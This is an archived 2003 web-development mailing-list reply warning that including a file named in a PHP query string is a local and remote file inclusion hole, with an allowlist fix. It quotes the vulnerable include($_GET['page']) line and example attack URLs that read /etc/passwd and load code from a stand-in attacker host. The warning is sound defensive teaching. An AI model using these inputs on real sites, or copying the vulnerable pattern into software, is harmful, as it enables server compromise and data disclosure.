[thelist] url specific session problem
Simon Willison
cs1spw at bath.ac.uk
Wed Sep 17 10:38:44 CDT 2003
elin tjerngren. artopod wrote:
> I have a weird PHP session problem.
> The links look something like this:
>
> index.php?page=intrview/archive.php
This is unrelated to your problem, but does that URL mean that somewhere
in your script you're doing this?
include($_GET['page']);
If so, you've got a HUGE security problem. What happens if someone
manually enters a URL like this for example:
index.php?page=/etc/passwd
Or even worse, if the fopen url wrappers option is set in your PHP
config file they could even do this:
index.php?page=http://evil.hax0r.ru/inject-some-php-code.txt
Where inject-som-php-code.txt is a file that looks like this:
<?php
// nasty PHP code that will be executed on your server
?>
A golden rule of writing secure PHP is NEVER include() or require() a
file that has been passed as a query string argument. Instead, do
soemthing like this:
$allowed = array(
'interview/archive.php',
'blah/blah.php',
// ... etc
);
if (in_array($_GET['page'], $allowed)) {
include($_GET['page']);
} else {
die('Invalid page');
}
That's more secure, but it's still revealing your site's implementation
details in the URL. The best URLs consist only of logical information,
with no clues as to the technology that powers a site. For example@:
http://www.yourdomain.com/interview/archive
If you're running Apache, the easiest way to achieve this kind of URL is
using mod_rewrite, which is way too big a topic to cover here.
Cheers,
Simon Willison
http://simon.incutio.com/ <-- nice URLs ;)
More information about the thelist
mailing list